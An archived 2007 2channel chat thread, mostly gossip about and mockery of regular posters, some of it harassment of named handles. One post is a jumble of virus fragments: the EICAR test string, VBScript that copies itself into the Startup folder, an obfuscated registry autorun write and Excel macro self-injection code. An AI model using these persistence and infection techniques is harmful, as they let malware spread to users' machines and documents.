5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ニュー速裏雑談スレ95

1 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/04(日) 09:06:32 ID:z0hcLHD1 ?PLT(13557)
前スレ
ニュー速裏雑談スレ94
http://tmp6.2ch.net/test/read.cgi/tubo/1181078227/

2 :最低人類0号:2007/11/04(日) 10:53:17 ID:Udn2K1eB
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub
܃ܷܵܶޫޭॢ
kak\.hta\';\ken=\wd+'\START

3 :νかおりん祭り ◆KAORIN3qpQ :2007/11/04(日) 14:36:21 ID:uax4Frb8 ?2BP(4100)
 |  |ノハヽ
 |  |。‘从 <新スレおめでとうございまーす♪
 |_と )
 |桃| ノ
 | ̄|


4 :最低人類0号:2007/11/04(日) 18:18:48 ID:ueg+XLbb
あれ?>>3が見えないけどまぁいいか…

5 :最低人類0号:2007/11/04(日) 22:17:10 ID:eVQYHGfv
>>1
キチガイ乙

6 :最低人類0号:2007/11/04(日) 23:02:14 ID:MCS4MjX/
数多くの伝説を残してきた裏雑談。
どれだけのことをクラス会に期待しただろうか。出席するも恋の始まりもなく終わったヤラハタあーちゃん
ODNに攻撃と懐柔を仕掛けるもついにODNに敗北。疲労で目の間はもちろん志望校のレベルと実際の実力も広がるおよいずむ
今はただネットできないだけからおとなしいと思われるマルメン
主食はスーパーの半額刺身と弁当の半ルンペンこれよろ
いつのまにか病人レベルも下位クラス、もはや存在感ゼロのピザ魔少年
あの魔少年に叩き臥した伝説のレスを今一度。叱責王のうおさん
女子高やめたが通信制の高校スタート。知り合いの店でバイトをしはじめた弟萌えの茲ちん
たまに裏雑に顔を出す分析王佐々木
雑談スレだけは立て続ける不揃いのトウモロコシようなガチャ歯エンジェル
裏雑ではなっかんで潜伏、元祖およさん粘着のヤイタン
すべての★を失いついに2ちゃんですら自分を装うものがなくなった後出しの王様のマッチョこと厨芥人
ニュー速警察署長ファンタジー中年ピョアさん
日中のニュー速に出現する日々が日をおって増えた謎のポキュンの私生活
名無しも長く同じスレにいればコテになることを証明した自治スレぐんまん、裏雑ODN。
女性専用車両もなんのそのを行く痴漢道まっしぐらで趣味は弾けないギター集めのうがさん
ついにつかんだ!種イイの自作自演
すっかりやることなくなりたまに自治スレでキリ番ゲットする★はVIPのみの代行
あの髭面晒して何を訴えたいのか、クララ
ボイスチャット、表雑談が消え、mixi移行、多くの固定が姿を消した・・・
ID導入、表雑談一時復帰、固定分散
着ぐるみ姿画像で可愛さを取り入れたをも34歳うなさんが帰ってくる・・・

7 :最低人類0号:2007/11/05(月) 01:50:09 ID:LDcq4wJ2
コピペ無職がさぼってdat落ち?

8 :これよろ:2007/11/05(月) 02:55:05 ID:e/vUT+JP
どうも、るんぺんです。
メインパソコン電源爆発しましたwwwwww

9 :最低人類0号:2007/11/05(月) 12:01:37 ID:lVs5Gvp0

        /ニYニヽ
   (ヽ   /( ゚ )( ゚ )ヽ   /)
  (((i ) /::::⌒`´⌒::::\  ( i)))    でっていうwwwwwwwwwwwwwww
 /∠_| ,-)___(-,|_ゝ \    
( ___、  |-┬-|    ,__ )   
    |    `ー'´   /´
    |         /

10 :最低人類0号:2007/11/05(月) 19:16:53 ID:h4gpRX4C
クズの立てた糞スレらしく見事に廃ってますね(笑)

11 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/05(月) 19:17:18 ID:HEh7Dfru ?PLT(14000)
誰がクズやねん

12 :最低人類0号:2007/11/06(火) 18:55:43 ID:7t+CN3KG
テメーだろ?

13 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/06(火) 20:47:47 ID:EyZRTX3b ?PLT(14000)
あ!?

もっぺんいってみーやこら!!

14 :最低人類0号:2007/11/07(水) 03:08:12 ID:jWIlSb9+
前スレ、フルーツ羽二重餅が現れたら速攻で落ちたな

15 :最低人類0号:2007/11/07(水) 11:34:40 ID:T9cavNkS
こいつって何のためにコテってるの?
まったく需要無いよね?

16 :最低人類0号:2007/11/07(水) 22:38:22 ID:Ki0BvJDs ?2BP(6072)
俺もそう思う

17 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/08(木) 04:59:40 ID:DiyDhDMF ?PLT(14000)
集団リンチかよ。

陰湿な奴らだな。

18 :最低人類0号:2007/11/08(木) 19:02:59 ID:wYPG4me9
消えれば?

19 :最低人類0号:2007/11/08(木) 20:32:33 ID:q/Zc42YL
117 名前: ◆cocoa.OGPs [] 投稿日:2007/11/08(木) 15:57:09 ID:Of8VrFR90 ?S★(813131)
ネカマだからしかたない

118 名前: ゴーストライター(dion軍)[sage] 投稿日:2007/11/08(木) 15:59:23 ID:DbmeurPU0 ?2BP(5665)
ポイント10000にしてくれ

119 名前:てんちょ[] 投稿日:2007/11/08(木) 16:01:20 ID:oloYgguM0
もれも ネカマwwwww

120 名前:チン顧問 ◆RitalinnSs [] 投稿日:2007/11/08(木) 16:23:53 ID:ApVYoQiMP
ボクはネナベ何ですけどね

121 名前:(●・ー・)うが ◆bubieKXPF2 [] 投稿日:2007/11/08(木) 19:43:35 ID:6lNoJLH00
じゃ、俺もネナベってことでー。

122 名前:ねずみランド(贋物)[sagew] 投稿日:2007/11/08(木) 20:05:59 妹 ID:XZvqDZLH0 ?PLT(22223)
あたし女だけど?

123 名前: 合コン大王(コネチカット州)[sage] 投稿日:2007/11/08(木) 20:20:08 ID:DXDksjDKO
>>117
女:33歳:10月2日生まれ:A型:※馬小屋育ち
>>119
男:52歳:2月27日生まれ:O型:息子が愚連隊
>>120
半陰陽:12月25日没:O型
>>122
マジモンの女子高生!


どうしてうがさんだけ無視するんですか(><)、くれくれのやつはともかく

20 :最低人類0号:2007/11/09(金) 16:48:23 ID:hY1KKWUv
でも、無職が無視しないんだからいいじゃないですか…w

21 :これよろ:2007/11/10(土) 21:28:06 ID:CibYLC8Y
オンラインゲーム内で話術のみで敵対超大手党内部崩壊させたwww
オレスゲェ!!

22 :最低人類0号:2007/11/11(日) 00:17:08 ID:KbdFP8TL
お前の家庭も内部崩壊してるじゃん。

23 :最低人類0号:2007/11/11(日) 03:20:00 ID:ssoYBs6D
ふいたw

24 :これよろ:2007/11/11(日) 07:23:51 ID:tO8HFwg9
>>22
www
まんざら外れてないな。
親離婚したし。

25 :最低人類0号:2007/11/11(日) 08:51:35 ID:Y8Pp+iPl
>>14
スレが落ちてるの今きづいたよ
予想通りだな

26 :最低人類0号:2007/11/11(日) 09:45:38 ID:+g029YyO
また爺がウインナー買ってきた。今日も買ってきた。

27 :最低人類0号:2007/11/11(日) 11:30:08 ID:jabXb/JE
>>24
>離婚
いつも言い争ってるよりよかったんじゃね?

28 :最低人類0号:2007/11/11(日) 21:17:29 ID:CO44MQnp
80 名前: 自民党工作員(神奈川県)[] 投稿日:2007/11/11(日) 15:35:04 ID:Wx8st6Hp0
138 名前:Q熱うさぎ耳ん ◆aVOJ1aPZ0Q [] 投稿日:2007/11/11(日) 20:59:10 ID:Wx8st6Hp0 ?PLT(12010)

>>20
クレジットカードも株口座も無いおとこの人って・・・
http://news23.2ch.net/test/read.cgi/news/1194680078/80
80 名前: 自民党工作員(神奈川県)[] 投稿日:2007/11/11(日) 15:35:04 ID:Wx8st6Hp0
無職だけど
みずほマイレージ
UC
JCB
amazon
楽天
しか持ってない

29 :最低人類0号:2007/11/11(日) 22:26:48 ID:wgwVwejB
かわいそうだから見てみぬ振りしようぜ

30 :最低人類0号:2007/11/13(火) 03:08:18 ID:p1js7vHn
17 名前: ◆DAIKOUEnIQ [sage] 投稿日:2007/11/13(火) 01:14:08 ID:ZtJ4XWtp
今日も高級料理でも食べてきたのか?(笑)
残飯しか食えないくせに

55 名前: ◆DAIKOUEnIQ [sage] 投稿日:2007/11/13(火) 01:46:29 ID:ZtJ4XWtp
http://tokyokitty.blogspot.com/

久しぶりに惨敗日記更新した。

寝るか

31 :最低人類0号:2007/11/13(火) 03:09:53 ID:p1js7vHn
10 名前:Rudy ◆S1RudyQzi. [sage] 投稿日:2007/11/13(火) 01:00:46 ID:+XEMxS64
⊂( ⊂(´_ゝ`)>>1 ヲッスヲッス

33 名前:Rudy ◆S1RudyQzi. [sage] 投稿日:2007/11/13(火) 01:20:34 ID:+XEMxS64
⊂( ⊂(´_ゝ`)本名でスレ立ててくれるなんて、故人も浮かばれるでしょうね

45 名前:Rudy ◆S1RudyQzi. [sage] 投稿日:2007/11/13(火) 01:29:44 ID:+XEMxS64
⊂( ⊂(´_ゝ`)新スレになると出てこなくなるお約束はきっちり守ってるんだな
        式場の先生に指示されてんの?

53 名前:Rudy ◆S1RudyQzi. [sage] 投稿日:2007/11/13(火) 01:41:01 ID:+XEMxS64
⊂( ⊂(´_ゝ`)私も寝よっと。ウスラバカ泣きじゃくって出てこないし。





東京キティを追い続けるババァコンビw
まだやってたのかこいつら^^;

32 :最低人類0号:2007/11/14(水) 06:05:39 ID:4KY7auYi
150日ルール

33 :最低人類0号:2007/11/14(水) 22:22:11 ID:Oy6BRhnP
150 名前: 大統領(アラバマ州)[] 投稿日:2007/11/14(水) 21:53:41 ID:X0XQ4b/W0 ?PLT(12557)
ホント、フエナイワネェ・・・
イヤニナッチャウワン、。

156 名前: 大統領(アラバマ州)[] 投稿日:2007/11/14(水) 22:08:27 ID:X0XQ4b/W0 ?PLT(13072)
ポイントクダサイ
タクサンクダサイ

160 名前: 大統領(アラバマ州)[] 投稿日:2007/11/14(水) 22:09:52 ID:X0XQ4b/W0 ?PLT(13072)
アラ。
ポイントアリガトウゴザイマス。
トッテモウレシイデゴザイマス。

164 名前: 大統領(アラバマ州)[] 投稿日:2007/11/14(水) 22:14:15 ID:X0XQ4b/W0 ?PLT(13072)
>>161
宇宙刑事サン最近ミマセンワネ。
キット悪イ宇宙人サンヲツカマエルタメニ頑張ッテイルノデショウ・・・

34 :最低人類0号:2007/11/14(水) 22:36:09 ID:olS0X3LG
うがさん・・・
うがさんじゃ貰えないって気づいてたんだ・・・

35 :最低人類0号:2007/11/15(木) 18:11:18 ID:Gf+QTNfJ
925 (´・ω・`)チビタンナノ☆ ◆ETQ0kuR9JE [] 2007/11/15(木) 18:00:23 ID:ht1pLPCOO 

(⌒─-⌒)
((´・ω・`))ニヤニヤ…
  ゚し-J゚

コイツうぜぇ死ね

36 :最低人類0号:2007/11/15(木) 20:15:20 ID:QRmcPo2X
>>34
貰えてるし。
お前が貰えなかったからってひがむなよw

こんなポインョ配って相手にしてもらおうとするクズなんて
いちいち誰が誰とか認識してねーよ
現におれのポインョ全部クズからの貢ぎもんだしw

37 :最低人類0号:2007/11/15(木) 20:42:45 ID:QEpgG+tq
送ってくれた相手をクズ呼ばわりですか
最低クラスの人間ですね

38 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/15(木) 20:46:52 ID:1UizwMo3 ?PLT(15072)
まさかうがさんじゃないでしょ。

39 :最低人類0号:2007/11/15(木) 21:57:46 ID:vbyefZMq
ポインヨとかタラミーとかトヨヨとか・・・
イヤな言い方する人ってあんまりいないよね

40 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/16(金) 00:04:13 ID:1UizwMo3 ?PLT(15072)
うがさん・・・

41 :最低人類0号:2007/11/16(金) 01:06:23 ID:nF4MlR32
今度ポイントクレクレスレ立ったら
>>36貼るの忘れるなよ

42 :最低人類0号:2007/11/16(金) 21:07:51 ID:P1YG60d0
タラマー(笑) アヂー(笑) アベニール(笑) 年収600万(笑) 水冷PC(笑)
趣味はギター(笑) 天才SE(笑) 銀のさら2人前(笑) 青薔薇さん(笑)
サラダ将軍を論破(笑) 弟は中古車屋(笑) 無職がコピペ(笑) ぶびぃ(笑)
仙台に栄転(笑) 名無し潜伏(笑) アラバマ州→宮城県(笑) 独身貴族(笑)

43 :最低人類0号:2007/11/16(金) 21:55:14 ID:pgCUjzSP
厨芥人さんはマジ良い人かと思った!!

44 :最低人類0号:2007/11/16(金) 22:02:07 ID:FboMXzC+
アベニール→ボーナスで一括購入だぜぃ、中古車屋につとめる兄貴、仙台まで車を運転して届けるw
        わざわざメーター伸ばすなんてアホ
年収600マン→10時過ぎまで残業してこの年収、でも年に100万も200万も勝手にたまるんだってww
水冷PC→購入時すげーじまんしてたのに、今となっては粗大ゴミ同然。微妙でほんと知恵の無い人間が組んだとしか
      思えないスペックの自作を現在使用中、ケースダサすぎwww
趣味はギター→確か弾けないんですよねw昔たったギタースレで論破されて逃げたしww

サラダだのぬんちゃくだのクララだのってお前リアルんとき
ほとんど相手にされてなかったじゃないっすかw
          

45 :最低人類0号:2007/11/17(土) 21:04:25 ID:tfZoZJC/
うがほど真性だと叩いても面白みが

46 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/17(土) 21:23:40 ID:bJ7y3KXV ?PLT(15072)
なんでそんなに粘着アンチいるの?

47 :最低人類0号:2007/11/17(土) 21:26:41 ID:CadUapI8
ま、いんじゃまいか

48 :最低人類0号:2007/11/17(土) 22:46:26 ID:weIxDhoh
懐古
独り言
自慢と名無しで煽り

ああはなりたくない!というコテ反面教師

49 :最低人類0号:2007/11/18(日) 00:48:32 ID:9nc+JjNr
あーさんを名無し潜伏で潰したぼっさんがまたニュー速で人気復活しとるwww

50 :最低人類0号:2007/11/18(日) 01:02:15 ID:cevnWJci
http://hissi.dyndns.ws/read.php/news/20071117/Wk1sQVJ0cXIw.html

リアルが満たされてると自称してる割に
物凄い。。。


51 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/18(日) 01:04:03 ID:xflI6AWK ?PLT(15072)
害のあるコテたたくならわかるけど。
うがさん別に悪い人じゃないしな

52 :最低人類0号:2007/11/18(日) 01:06:30 ID:McZBGl2e
>>51
あんま相手したくはないが自治スレ5年分ROMってからそういうことは言えw
そうとうねちっこいぞ

53 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/18(日) 01:08:20 ID:xflI6AWK ?PLT(15072)
さよかw

54 :最低人類0号:2007/11/18(日) 01:09:46 ID:cevnWJci
))51

お前は自演炎上時代を知らんからw
うがの低能さは異常w

狂ってるなら狂ってる、もしくは演じてるでいいんだけど
あの人、自分をまともと思ってはばからない人だし。

55 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/18(日) 01:11:07 ID:xflI6AWK ?PLT(15072)
なるへそ

56 :陵辱:2007/11/18(日) 08:01:55 ID:nfJUdMxi
えんじぇるさんとRudyさん元気ですか?

57 :最低人類0号:2007/11/18(日) 15:24:43 ID:cevnWJci
GVLJnwyZ0

http://news23.2ch.net/test/read.cgi/news/1195343413/


集中砲火で涙目逃走w
30半ばでがきに論破されるなんて何も成長してナインすねwうがさん(笑)コジョルー(笑)

58 :フルーツ羽二重餅 ◆FruitZ.DG. :2007/11/18(日) 15:32:53 ID:xflI6AWK ?PLT(15072)
これはw

59 :最低人類0号:2007/11/18(日) 18:52:56 ID:TYpJuSNW
厨芥人さんはマジ良い人かと思った!!

60 :最低人類0号:2007/11/18(日) 19:49:46 ID:cevnWJci
130 名前: 大道芸人(アラバマ州)[] 投稿日:2007/11/18(日) 17:33:29 ID:GVLJnwyZ0
128ってぐんまんなの?
あれ、俺、NGのリストに登録してるみたい・・・
どっかで悪口言われたのかしらん・・・
特に重要な書き込みでも無いみたいだから、解除しなくていいのかしら?

61 :最低人類0号:2007/11/18(日) 21:18:09 ID:1rg4CO4b
ハテ?

62 :最低人類0号:2007/11/18(日) 22:00:20 ID:cevnWJci
34 名前: 大道芸人(アラバマ州)[] 投稿日:2007/11/18(日) 21:48:19 ID:GVLJnwyZ0
結構住民入れ替わってる
って話聞くけど、本当みたいねぇ。

空気読めないで、変な煽り入れてくるアホも最近多いし・・・
嘆かわしいことだ。


63 :最低人類0号:2007/11/19(月) 00:21:43 ID:zRj3rser
http://jp.youtube.com/watch?v=vGfjdmkc_gQ

あーさん、レスポンスしたれや

64 :最低人類0号:2007/11/19(月) 19:44:21 ID:aSgpaA9H
ここまだあったのかよw
およいずむやあがいた頃が最盛期だったんじゃない?

65 :最低人類0号:2007/11/19(月) 19:48:40 ID:629JEo4o
最近来た新参は全部目を通しておくように


ニュース速報裏雑談倉庫
http://2ch.nobody.jp/

最悪板@ツーチャンネル ニュース速報板裏雑談スレ過去ログ
http://www.geocities.jp/urazatudan/

66 :これよろ:2007/11/19(月) 22:27:34 ID:oXAcfCj7
もう人生疲れた。

67 :最低人類0号:2007/11/19(月) 23:44:22 ID:oYr4/J/e
あ とおよは伝説のツートップ
あの二人を超えるやつらは永遠に現れない

68 :最低人類0号:2007/11/20(火) 01:40:13 ID:Zi5zdmxk
あーさん乙です

69 :最低人類0号:2007/11/23(金) 20:15:02 ID:CFSvOa9S
>>67
今何やってんだろうねぇ結構深く関わってたコテだけど気になるわ
俺はいま新h(以下略 で忙しいが酒の力でこんなことをかいている

70 :最低人類0号:2007/11/23(金) 20:21:02 ID:CFSvOa9S
およ と あ の敗因は経験不足=若さ だった
あいつらは頭が本当にいい 学歴とは違う何かがあったのは確か。方向性は違うがセンスっていうのかな
あ は学歴を手に入れた およ は今何やってるかしらんが、学歴手に入れられなくてもがんばって欲しいよ
学歴手に入れられたならおめでとう。およ には終盤嫌われたっぽいが俺は嫌いじゃなかったよ

71 :最低人類0号:2007/11/23(金) 22:10:24 ID:ExiQkPWg
おまえ、ずっとおよをつけまわしてたやつかwwww
見てておもろかったよwwww

72 :これよろ:2007/11/23(金) 23:09:41 ID:U1Iqm2DB
甥が2週間家に来てたがようやく俺に人を慈しむ心が生まれた。
こんな些細な事でも人生観変わるものなんだな、
ただ甥が帰って母親が泣いててたまらん。

73 :最低人類0号:2007/11/24(土) 09:59:36 ID:I0EjCls9
odnか


74 :最低人類0号:2007/11/24(土) 22:28:18 ID:HWuXOGSb
>>72
なんだかんだ言って親が心配なのはわかる俺もそうだし
だが親はいつか死ぬ運命にあるから自分のことを考えるべき。
それが将来的には親の安心につながる。

75 :最低人類0号:2007/11/25(日) 19:00:21 ID:RS0kjqCI
佐々木、暇ならピアキャストで配信してよ

76 :最低人類0号:2007/11/26(月) 18:09:24 ID:TIJazLTY
>>74
両親健在で両親の経済基盤しっかりしてたら俺も自身の事だけ考えるんだけどね・・・・・・・・・・・・・・・・
妹も下手な資産家に嫁いだから向こうの両親が甥の長男の端午の節句やらで普通に親族集めて
お披露目会とかするとか言い出したりでその度に飛行機代10万単位で飛んでくし
鎧とか破魔矢とか購入せんといけんしもううちの一家ボロボロですたい。
長男だから何かある度に親族の集まりで挨拶させられるし俺の精神もボロボロ、
おまけに母親は「子供の顔がみたい。」やら言い出すしもう人生冒険できない雰囲気に
周りが固めてきた。

・・・・・・・・・・・・・・固めてきた!!

77 :最低人類0号:2007/11/26(月) 20:53:21 ID:xB8MLZIZ
グダグダ言い訳付けて逃げてんじゃ子供扱いされて当然だよハゲ。
金が無いなら貧乏オーラ出しときゃいい。
気付かない具鈍なら直接言えばいい。

つまんねープライドなんざ捨てろ。放置したら死ぬ訳じゃねーんなら親も放っとけ。
どれもこれもお前の人生にとってマイナス要因じゃねーか。


78 :これよろ:2007/11/26(月) 21:08:30 ID:TIJazLTY
マイナスだから切り捨てていくだけでは
それは家族ではないし人間ではないよ。
俺は全員幸せにするよ。

79 :最低人類0号:2007/11/28(水) 23:34:47 ID:wBY7ZaBV
自立できないやつを見て親が安心するとでも思ってるのか

80 :これよろ:2007/11/29(木) 00:15:52 ID:kL+2511J
何で自立してない事になってんだ?・・・・・・・・・・・・・・・・・・
前から変わった認識と言うか一人で勝手に思い込んでる人いて気になってたんだが。

81 :最低人類0号:2007/11/29(木) 00:17:22 ID:Ohzd0AMI
あ っそうなん?
ところでイラストレーターはどうなったんだ?

82 :これよろ:2007/11/29(木) 00:29:20 ID:kL+2511J
親父の前の職場の同僚から単発で仕事もらったりしてたが食えんな。
実力的にもどうかと思うので普通に仕事して
30まで勉強しなおして行けそうならいく感じで過ごしてるよ。
もうなんか一度イラストで金もらって夢が夢でなくなった瞬間
「あ、どの仕事もやる事そんな変わらないかも。」と言う事に気が付いて
なんか昔からもってた執着とかそういうのが一切消えた。

今までその方面に行かないと自分が自分でなくなる恐怖みたいなのがあったけど
それが過去のトラウマから来る勘違いだと実感できた。
イラスト、漫画描くの止めるとか言うんじゃなくて
もうすこしおざなりにしてきた家族とか支えつつ
できることをやっていこうと思うようになったよ。

83 :最低人類0号:2007/11/29(木) 00:34:40 ID:wYR9zsUf
だめな長文の典型

84 :これよろ:2007/11/29(木) 00:35:16 ID:kL+2511J
それはすまんw

85 :最低人類0号:2007/11/29(木) 09:37:24 ID:WXdORB5J
あーさんも来年には県庁勤務か

86 :最低人類0号:2007/11/29(木) 16:49:58 ID:CLxFvoke
それ再来年じゃね?
てか院行くんじゃね?

87 :最低人類0号:2007/11/30(金) 11:56:22 ID:p4NxC6rI
>>85
あのゴネ厨が県庁とかマジだったらワロスw
たぶんショックで死ぬかもしれんぞw

88 :最低人類0号:2007/11/30(金) 23:08:10 ID:MWu+9kJh
あのクララは今

イギリス人「JAPが国旗の解決案を提示してきやがった!」ねらーの送ったデザインが掲載される
http://news23.2ch.net/test/read.cgi/news/1196429793/


60 : 酒類販売業(長野県) :2007/11/30(金) 22:41:18 (p)ID:1Vfk0l280(3) (p)?BRZ(10132)
ルイズwwwwwwwwwwwwww


254 : 酒類販売業(長野県) :2007/11/30(金) 22:49:59 (p)ID:1Vfk0l280(3) (p)?BRZ(10132)
誰か、ルイズの国歌のコピペ貼ってくれよw もちろんイギリス国旗で



290 : 酒類販売業(長野県) :2007/11/30(金) 22:51:20 (p)ID:1Vfk0l280(3) (p)?BRZ(10132)
>>267
もう、イギリス国旗でいいからなw








(´Д⊂ハライテ

89 :最低人類0号:2007/11/30(金) 23:16:09 ID:rqQFScMR
>>88
これも怪しいなw

ルイズ・フランソワーズ・ル・ブラン・ド・ラ・ヴァリエール
http://ex20.2ch.net/test/read.cgi/wall/1195918340/139

139 名前:壁に耳あり、障子にメアリーさん[sage] 投稿日:2007/11/30(金) 23:10:56
ニュー速でのルイズの知名度がアップしたぞー\(^o^)/
エゲレス人感謝感謝

90 :最低人類0号:2007/12/01(土) 00:36:46 ID:Tt6bgkPa
クララって30過ぎたおっさんだろ。
あいつオタクだったっけ?

91 :最低人類0号:2007/12/01(土) 01:24:01 ID:LNXAoLWi
>>90
二・三年前に二次元に手を出した。
馬が合うのか、もう戻って来れないと思う。
クララさんは結婚したのかね?

92 :最低人類0号:2007/12/01(土) 09:56:37 ID:yglV9h17
したらしいけどな

93 :最低人類0号:2007/12/01(土) 13:06:03 ID:ecNi9LWo
>>91
お前佐々木だろ

94 :最低人類0号:2007/12/01(土) 13:52:14 ID:Tt6bgkPa
うが

ニュース速民が選ぶ「へんないきもの」
http://news23.2ch.net/test/read.cgi/news/1196484356/35

35 名前: 人気者(アラバマ州)[] 投稿日:2007/12/01(土) 13:49:57 ID:gBqKjRBf0
現役宇宙刑事 サリバン
456さん

95 :最低人類0号:2007/12/01(土) 19:10:48 ID:VE1tEC50
2chサーバーダウン(鯖落ち)情報 part174 .zip


621 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 19:04:43 ID:lGokxYjU0
ま、原因わかったから、大人しく待ってるしかねーな・・・

625 名前:動け動けウゴウゴ2ちゃんねる[sage] 投稿日:2007/12/01(土) 19:04:59 ID:N5j06ndd0
>>605
あれはいつものことだからしょうがない

663 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 19:07:54 ID:lGokxYjU0
>>636
あらま・・・
ご愁傷様でございますこと・・・
オホホホホ・・・、。


無視されてるくせによくコテ付きで運営系板に顔出せるなww
変態じゃないの?w

96 :最低人類0号:2007/12/01(土) 19:20:40 ID:Bo2/66NF
18            2007年12月01日 18:31

うが

(●・_・)なんだなんだ どうしたどうした・・・

って今回は本当に閉鎖かいな???
そろそろ真っ当な生活に戻れ ってことか?

ttp://mixi.jp/view_bbs.pl?id=25633866&comm_id=73138



こいつmixiにもいるのかよ
mixiじゃ、あぼーん出来ないからマジで鬱陶しいわ


97 :最低人類0号:2007/12/01(土) 19:52:37 ID:VE1tEC50
775 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 19:20:26 ID:lGokxYjU0
>>768
まじですることが無くなる
というのが、ニントモカントモ・・・

843 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 19:28:10 ID:lGokxYjU0
復帰しても規制だらけかぁ・・・
って一体何が起きたんだよ、俺が寝てる間に・・・

874 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 19:32:01 ID:lGokxYjU0
>>870
これからも、強く生きていってください。

948 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 19:40:29 ID:lGokxYjU0
>>924
あらまぁ・・・
土日に重なるとは、因果なものよのぅ・・・
ぐふぅ。。。

土曜日スレ難民とか言われちまうし・・・

972 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 19:42:42 ID:lGokxYjU0
取りあえず避難所作って新規で再開して、後からデータ取り出せたら
ログを注入して復帰って感じかしら?
ログが取り出せるといいわねぇ。

ま、前にも何度もあったしな。

990 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 19:43:27 ID:lGokxYjU0
>>971
食べ過ぎ、飲み過ぎには注意しましょうね。
オネーチャンもほどほどに・・・

98 :最低人類0号:2007/12/01(土) 20:17:04 ID:VE1tEC50
150 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 20:01:01 ID:lGokxYjU0
当分復帰しないのかなぁ・・・

193 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 20:03:14 ID:lGokxYjU0
>>179
確実にお腹壊しちゃうよね!

228 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 20:05:27 ID:lGokxYjU0
>>215
今ミネストローネスープ煮込んでるとこなんだよぅ。
いつもなら、ν即で暇つぶし出来るんだけど・・・

270 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 20:07:22 ID:lGokxYjU0 ?PLT(13072)
>>250
BE補充したの?

373 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 20:12:33 ID:lGokxYjU0 ?PLT(13072)
>>325
いつも目の前にはν即なのねぇ・・・

408 名前:(●・_・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 20:14:07 ID:lGokxYjU0 ?PLT(13072)
>>389
そっちにもすぐにコピペされるだけだしw
あんま意味無いかも・・・w

455 名前:(●・ー・)うが ◆bubieKXPF2 [] 投稿日:2007/12/01(土) 20:16:04 ID:lGokxYjU0 ?PLT(13072)
>>422
お!
早いね!

99 :最低人類0号:2007/12/01(土) 20:39:02 ID:LNXAoLWi
残念歩キュンさんでした
でも佐々木さんはこれ以上のセンスを入っているのだろうねぇ


100 :最低人類0号:2007/12/01(土) 20:44:56 ID:LNXAoLWi
>>92
そうかーお幸せに
二次元もいいけど奥さんを不安にさせないでね

101 :これよろ:2007/12/01(土) 21:15:14 ID:ZIhR1IIy
久しぶりに見たなぽきゅんさん。

102 :最低人類0号:2007/12/01(土) 23:58:36 ID:fM9NY1IP
pqnってまだ生きてたのか

103 :最低人類0号:2007/12/02(日) 11:47:46 ID:SBGL5/vV
はげてないよ

104 :最低人類0号:2007/12/02(日) 11:57:39 ID:mUp+Swj6
【涙目】ニュース速報@運用情報48【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196528902/963

うが=ID:91pAh7rN0

963 名前:動け動けウゴウゴ2ちゃんねる[] 投稿日:2007/12/02(日) 11:56:11 ID:91pAh7rN0
>>957
FOXに言え
そんな事イチイチシルカハゲ
7割合ってんだから問題ネーンジャボケ
狐の実験場でワカワカンネエ事ホザイテンジャネーヨ



105 :最低人類0号:2007/12/02(日) 11:59:02 ID:mUp+Swj6
626 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 09:15:21 ID:91pAh7rN0
巻き添えのヤツも運営糞スレ立てた馬鹿も
ちょっとおとなしくしよけよ
規制なんていつもの事だろ?

640 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 09:29:59 ID:91pAh7rN0
>>635
どこが?

830 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 10:23:44 ID:91pAh7rN0
>>802
涙目wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

